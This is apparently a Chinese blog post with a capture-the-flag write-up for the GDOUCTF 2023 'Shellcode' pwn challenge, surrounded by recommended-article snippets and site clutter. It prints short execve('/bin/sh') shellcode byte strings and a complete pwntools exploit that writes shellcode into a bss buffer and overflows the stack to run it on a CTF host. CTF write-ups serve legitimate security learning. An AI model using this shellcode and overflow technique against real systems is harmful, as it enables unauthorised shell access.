[GDOUCTF 2023]Shellcode

最新推荐文章于 2025-05-29 14:39:42 发布
最新推荐文章于 2025-05-29 14:39:42 发布
阅读量535 收藏 11
点赞数 9
分类专栏: pwn刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74355719/article/details/134698284
版权 

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[10]; // [rsp+6h] [rbp-Ah] BYREF

  setbuf(stdin, 0LL);
  setbuf(stderr, 0LL);
  setbuf(stdout, 0LL);
  mprotect((void *)((unsigned __int64)&stdout & 0xFFFFFFFFFFFFF000LL), 0x1000uLL, 7);
  puts("Please.");
  read(0, &name, 0x25uLL);
  puts("Nice to meet you.");
  puts("Let's start!");
  read(0, buf, 0x40uLL);
  return 0;
}

name 位于 bss 段,所以我们就想到了可以在 read(name)这边写入我们的 shellcode。但 是,这里,在主函数中我们可以看到这里对于读入的字节数进行了限制,最大读入数是 25 字节。而我们使用 shellcraft 默认生成的字节数是 44 字节的,显然不符合我们的要求。 然后随便找一个小于 25 字节的 shellcode 【顺便积累一下常见的短字节 shellcode: 32 位

短字节 shellcode -> 21 字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80

64 位 较短的 shellcode 23 字节 \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f \x05

from pwn import *

p=remote('node4.anna.nssctf.cn',28107)
name_addr=0x6010A0

payload=b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"

p.sendlineafter(b"Please.",payload)

payload=b'a'*18+p64(name_addr)


p.sendlineafter(b"Let's start!",payload)


p.interactive()

CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1)
m0_61330806的博客
04-07 692
这个页面按下F5,反汇编为伪代码看到关键函数system()点进去看一下,是不是我们要的那种。双击那个system(a)好极了,就是这个。再来看一下变量command是如何传进去的,左上角箭头,回到历史记录再分析一下程序,用户的输入被存到了变量a中,a经过fun函数后,传入system函数执行,也就是说,command就是a,也就是用户的输入。再双击fun看一下,有没有特殊处理经典的字符串倒置代码,也就是说,它会把你的输入倒过来,即ls->sl ,cat flag->galf tac。
pe_to_shellcode:将PE转换为Shellcode
05-09
pe_to_shellcode 转换PE,以便可以像普通shellcode一样将其注入。 (同时,输出文件仍然是有效的PE)。 同时支持32位和64位PE 作者: 和 客观的 该项目的目标是提供一种生成PE文件的可能性,该文件可以轻松完成...
[GDOUCTF 2023]Shellcode 全网最详细write up
qq_41937545的博客
11-02 1050
64 位 较短的 shellcode -> 23 字节 \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f \x05】​。32 位 短字节 shellcode -> 21 字节 \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80。并且没有后门没有system。
GDOUCTF2023 Crypto Pwn
qq_41626232的博客
04-16 2749
比赛用的蠢方法做的,发现x为52位时可以使用small_roots,(这个很好找到上界,没考虑epsilon参数)然后简单爆破2^12=4096解空间。这个用ctypes库加载libc文件,然后随机数就一模一样了,没见过的话,可以看一看,感觉很好用。参数的默认值为0.05,该默认参数下的bound不足以解出本题的小整数解,根据。我做的时候忘记看题目名字了,溢出大小还行,用常规的ret2libc做的。我直接把fake的base64密文全删了,然后就给了一个压缩包出来了。这不是misc题吗?
GDOUCTF2023 Writeup
S4n_v1的博客
04-16 1877
钝角
Android系统shellcode编写.zip_android_shellcode
09-23
在Android系统中,shellcode是一种特殊的代码片段,用于在获得程序执行权限后,实现特定功能,比如控制系统、执行恶意操作等。随着Android设备的广泛使用,Android系统的安全性变得至关重要,而shellcode的编写和...
shellcode加载器
10-02
Shellcode加载器是一种技术,主要用于在目标系统上执行任意代码,通常用于渗透测试或恶意软件开发。Shellcode是一小段机器码,可以直接被CPU执行,而无需通过解释器或虚拟机。这种加载器的设计旨在绕过安全机制,...
shellcode帮助工具,直接把exe转shellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s <format> ...
rust-windows-shellcode:Rust中的Windows Shellcode开发
03-05
用Rust编写Windows Shellcode 项目概况 Windows shellcode项目位于shellcode/ ,它可以构建为仅包含.text节的PE文件,并且没有外部依赖项。 然后,我们可以转储.text节并进行一些修补以使其与位置无关。 这个想法...
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
[GDOUCTF 2023] crypto pwn 部分
weixin_52640415的博客
04-17 1013
GDOUCTF 2023 crypto,pwn
20222806 2022-2023-2 《网络攻防实践》实践九报告
qq_34529750的博客
05-10 450
本次学习了pwn方向上的三种缓冲区溢出攻击,深刻的理解了pwn的困难之处,这还是在实验环境下关掉随机地址等等的条件做的,对于网络攻防要学习的地方还有很多。
打造200字节的最短通用ShellCode
木休的斋堂
03-14 1994
本篇文章源自《黑客防线》2007年4月刊 作者:王炜/ww0830 ShellCode,在保持对各个版本通用性的基础上,当然是越短越好,这不仅仅是黑客艺术对简单美的追求,更重要的是有时候能利用的空间只有这么少。这不,这次我就遇到了长度限制只有210字节的情况。网上看了一下,属于比较短的ShellCode有“382 bytes bind port shellcode for win2k all
2025年渗透测试面试题总结-匿名[实习]安全工程师(安全厂商)(题目+回答)
soc的博客
05-25 1223
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
联软SDP+安渡:收敛暴露面 从生产网自动取数 安全高效
leagsoft_1003的博客
05-28 933
制造业网络安全面临网络隔离与数据流通的矛盾。为解决供应商跨网协作中的安全风险和管理痛点,联软推出安渡SDP解决方案:通过专用加密隧道实现安全访问,采用IP协议栈隔离、数据指令分离等创新技术,在不开放网络端口的情况下完成自动化数据摆渡。该方案既保障了文件传输的安全性,又提高了办公效率,实现了网络安全防护与业务便捷性的统一。典型应用于BOM系统审批后的图纸自动传输场景,有效规避U盘拷贝、即时通讯等传统方式的安全隐患。
考虑安全稳定约束的优化调度综述
weixin_53126442的博客
05-25 1267
大量电力电子装置的接入改变了系统电压失稳机理。近年来,我国特高压直流密集投运,受端电网中火电机组占比下降[46-48]。基于电网换相换流器(Line Commuted Converter,LCC)的直流系统无功电压调节特性与同步机相反。当交流母线电压下降时,LCC反而会吸收更多的无功,进一步加重系统调压负担[49]-[51]。随着我国光伏和风电的不断发展,大量电压源型换流器(Voltage Source Converter,VSC)接入电网[19,52]。
企业im怎么选? BeeWorks -安全的企业内部通讯软件
weixin_53855915的博客
05-27 470
当即时通讯不再局限于简单的信息传递,而是与企业的业务流程、数据安全、设备协同深度融合时,它所释放的能量正推动着企业办公模式向更智能、更高效的方向迈进。这种对安全的极致追求,让企业在享受即时通讯便捷性的同时,无需为信息安全问题担忧。在数字化办公浪潮席卷而来的当下,企业对内部沟通工具的需求早已超越简单的信息传递,转而追求安全、高效且功能集成的整体解决方案。其即时通讯功能不仅支持文本、语音、视频等多元沟通形式,更通过私有化部署的底层架构,为企业信息传递筑牢安全屏障,让每一次沟通都在可信的环境中实时发生。
如何给老旧 iOS App 添加安全保护?用 Ipa Guard 对 IPA 文件混淆加固实录
最新发布
2501_91510632的博客
05-29 899
摘要:本文分享了在没有源码的情况下,如何为老旧iOS应用添加安全防护的经验。作者面对一个仅有IPA文件的五年老项目,使用Ipa Guard工具实现了类名、方法名和资源的自动混淆,在10分钟内完成处理并保持功能完整。通过对比分析,混淆后的应用在类名识别度、资源命名、安全加固等方面效果显著提升。文章指出,对无法修改源码的老项目,采用专业混淆工具是快速提升安全性的有效方案,为类似场景提供了实用解决方案。(149字)
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值